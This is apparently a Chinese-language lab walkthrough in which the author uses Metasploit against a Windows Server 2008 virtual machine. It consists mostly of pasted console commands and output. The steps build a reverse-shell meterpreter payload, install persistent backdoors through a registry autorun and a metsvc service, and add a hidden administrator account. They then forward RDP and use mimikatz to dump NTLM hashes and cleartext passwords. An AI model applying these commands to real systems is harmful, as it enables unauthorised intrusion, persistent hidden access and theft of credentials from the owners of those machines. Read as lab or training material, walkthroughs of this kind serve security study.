Metasploit backdoor


OS: Windows Server 2008 (64位)


root@Kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=2013 X > file.exe Created by msfpayload ( . Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"", "LPORT"=>"2013"}


root@Kali:~# msfconsole msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST LHOST => msf exploit(handler) > set LPORT 2013 LPORT => 2013 msf exploit(handler) > exploit [*] Started reverse handler on [*] Starting the payload handler...


[*] Sending stage (769024 bytes) to [*] Meterpreter session 1 opened ( -> at 2014-03-13 22:23:18 +0800 meterpreter >


meterpreter > getuid //查看当前权限 Server username: WIN-K30V5SI0PCEAdministrator meterpreter > ps //列出当前进程 Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86_64 0 244 4 smss.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32smss.exe 264 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 336 328 csrss.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe 388 380 csrss.exe x86_64 1 NT AUTHORITYSYSTEM C:WindowsSystem32csrss.exe 396 328 wininit.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32wininit.exe 432 380 winlogon.exe x86_64 1 NT AUTHORITYSYSTEM C:WindowsSystem32winlogon.exe 492 396 services.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32services.exe 500 396 lsass.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32lsass.exe 512 396 lsm.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32lsm.exe 596 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 656 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32svchost.exe 748 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 796 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 840 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 856 388 conhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32conhost.exe 860 2044 cmd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32cmd.exe 884 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 924 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32svchost.exe 972 492 sppsvc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32sppsvc.exe 976 492 spoolsv.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32spoolsv.exe 1056 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 1092 492 vmtoolsd.exe x86_64 0 NT AUTHORITYSYSTEM C:Program FilesVMwareVMware 
Toolsvmtoolsd.exe 1332 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32svchost.exe 1492 2044 vmtoolsd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1560 492 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32dllhost.exe 1640 492 msdtc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32msdtc.exe 1968 492 taskhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32taskhost.exe 2024 884 dwm.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsSystem32dwm.exe 2044 2016 explorer.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowsexplorer.exe 2204 2428 mscorsvw.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2312 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 2332 2044 file.exe x86 1 WIN-K30V5SI0PCEAdministrator C:UsersAdministratorDesktopfile.exe 2428 492 mscorsvw.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2588 492 mscorsvw.exe x86 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe 2972 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe meterpreter > migrate 2044 //迁移到PID为2044的explorer进程 [*] Migrating from 2332 to 2044... [*] Migration completed successfully. meterpreter >


meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86_64 0 244 4 smss.exe x86_64 0 NT AUTHORITYSYSTEM SystemRootSystem32smss.exe 264 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe 336 328 csrss.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32csrss.exe 388 380 csrss.exe x86_64 1 NT AUTHORITYSYSTEM C:Windowssystem32csrss.exe 396 328 wininit.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32wininit.exe 432 380 winlogon.exe x86_64 1 NT AUTHORITYSYSTEM C:Windowssystem32winlogon.exe 492 396 services.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32services.exe 500 396 lsass.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32lsass.exe 512 396 lsm.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32lsm.exe 596 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe 656 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32svchost.exe 748 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:WindowsSystem32svchost.exe 796 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe 840 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe 856 388 conhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32conhost.exe 860 2044 cmd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32cmd.exe 884 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32svchost.exe 924 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32svchost.exe 972 492 sppsvc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:Windowssystem32sppsvc.exe 976 492 spoolsv.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsSystem32spoolsv.exe 1056 492 svchost.exe x86_64 0 NT AUTHORITYLOCAL SERVICE C:Windowssystem32svchost.exe 1092 492 vmtoolsd.exe x86_64 0 NT AUTHORITYSYSTEM C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1332 492 svchost.exe x86_64 0 NT AUTHORITYNETWORK SERVICE 
C:Windowssystem32svchost.exe 1492 2044 vmtoolsd.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Program FilesVMwareVMware Toolsvmtoolsd.exe 1560 492 dllhost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32dllhost.exe 1640 492 msdtc.exe x86_64 0 NT AUTHORITYNETWORK SERVICE C:WindowsSystem32msdtc.exe 1968 492 taskhost.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32taskhost.exe 2024 884 dwm.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:Windowssystem32Dwm.exe 2044 2016 explorer.exe x86_64 1 WIN-K30V5SI0PCEAdministrator C:WindowsExplorer.EXE 2312 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe 2428 492 mscorsvw.exe x86_64 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFramework64v2.0.50727mscorsvw.exe 2588 492 mscorsvw.exe x86 0 NT AUTHORITYSYSTEM C:WindowsMicrosoft.NETFrameworkv2.0.50727mscorsvw.exe 2972 492 svchost.exe x86_64 0 NT AUTHORITYSYSTEM C:Windowssystem32svchost.exe


meterpreter > run post/windows/gather/checkvm [*] Checking if WIN-K30V5SI0PCE is a Virtual Machine ..... [*] This is a VMware Virtual Machine meterpreter >


meterpreter > run persistence -h Meterpreter Script for creating a persistent backdoor on a target host. OPTIONS: -A Automatically start a matching multi/handler to connect to the agent -L Location in target host where to write payload to, if none %TEMP% will be used. -P Payload to use, default is windows/meterpreter/reverse_tcp. -S Automatically start the agent on boot as a service (with SYSTEM privileges) -T Alternate executable template to use -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i The interval in seconds between each connection attempt -p The port on the remote host where Metasploit is listening -r The IP of the system running Metasploit listening for the connect back meterpreter >


meterpreter > run persistence -X -i 10 -p 2241 -r [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= LPORT=2241 [*] Persistent agent script is 148439 bytes long [+] Persistent Script written to C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs [*] Executing script C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs [+] Agent executed with PID 2916 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ meterpreter >


msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST LHOST => msf exploit(handler) > set LPORT 2241 LPORT => 2241 msf exploit(handler) > exploit [*] Started reverse handler on [*] Starting the payload handler... [*] Sending stage (769024 bytes) to [*] Meterpreter session 1 opened ( -> at 2014-03-13 23:01:55 +0800 meterpreter >


meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn... [*] >> Uploading metsrv.x86.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed. meterpreter >


root@Kali:~# msfconsole , , / ((__---,,,---__)) (_) O O (_)_________ _ / | o_o M S F | _____ | * ||| WW||| ||| ||| Using notepad to track pentests? Have Metasploit Pro report on hosts, services, sessions and evidence -- type 'go_pro' to launch it now. =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0] + -- --=[ 1239 exploits - 755 auxiliary - 207 post + -- --=[ 324 payloads - 31 encoders - 8 nops msf > use multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/metsvc_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set RHOST RHOST => msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler... [*] Meterpreter session 1 opened ( -> at 2014-03-13 23:12:54 +0800 meterpreter >


meterpreter > run getgui -u zero -p haizeiwang123_ [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator [*] Carlos Perez [email protected] [*] Setting user account for logon [*] Adding User: zero with Password: haizeiwang123_ [*] Hiding user from Windows Login screen [*] Adding User: zero to local group 'Remote Desktop Users' [*] Adding User: zero to local group 'Administrators' [*] You can now login with the created user [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc meterpreter >


meterpreter > portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -L The local host to listen on (optional). -h Help banner. -l The local port to listen on. -p The remote port to connect to. -r The remote host to connect to. meterpreter > portfwd add -L 1234 -p 3389 -r [-] You must supply a local port, remote host, and remote port. meterpreter > portfwd add -l 1234 -p 3389 -r [*] Local TCP relay created: <-> meterpreter >


rdesktop -u zero -p haizeiwang123_

由于我的 Windows 2008 是 64 位的，而当前会话运行在 32 位的代理进程里（下面进程列表中 FfBoPtYGlNj.exe 的 Arch 为 x86），所以在加载 mimikatz 之前先要迁移到 64 位进程。（注意：下面粘贴的输出显示实际迁移到的是 PID 2264 的 explorer.exe，而不是命令里写的 2780。）

meterpreter > ps ...... 2000 472 dllhost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe 2264 1832 explorer.exe x86_64 2 WIN-K30V5SI0PCE\zero C:\Windows\explorer.exe 2292 2264 vmtoolsd.exe x86_64 2 WIN-K30V5SI0PCE\zero C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 2520 372 FfBoPtYGlNj.exe x86 1 WIN-K30V5SI0PCE\Administrator C:\Users\ADMINI~1\AppData\Local\Temp\1\rad87A98.tmp\FfBoPtYGlNj.exe 2780 2256 winlogon.exe x86_64 2 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe 3028 880 dwm.exe x86_64 2 WIN-K30V5SI0PCE\zero C:\Windows\System32\dwm.exe meterpreter > migrate 2780 [*] Removing existing TCP relays... [*] Successfully stopped TCP relay on [*] 1 TCP relay(s) removed. [*] Migrating from 1428 to 2264... [*] Migration completed successfully. [*] Recreating TCP relay(s)... [*] Local TCP relay recreated: <-> meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter >


meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;339062 NTLM WIN-K30V5SI0PCE Administrator lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be } 0;593431 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;593459 NTLM WIN-K30V5SI0PCE zero lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad } 0;995 Negotiate NT AUTHORITY IUSR n.s. (Credentials KO) 0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO) 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;47971 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ n.s. (Credentials KO)


meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;999 NTLM WORKGROUP WIN-K30V5SI0PCE$ 0;996 Negotiate WORKGROUP WIN-K30V5SI0PCE$ 0;47971 NTLM 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;995 Negotiate NT AUTHORITY IUSR 0;339062 NTLM WIN-K30V5SI0PCE Administrator ceshimima123_ 0;593459 NTLM WIN-K30V5SI0PCE zero haizeiwang123_ 0;593431 NTLM WIN-K30V5SI0PCE zero haizeiwang123_
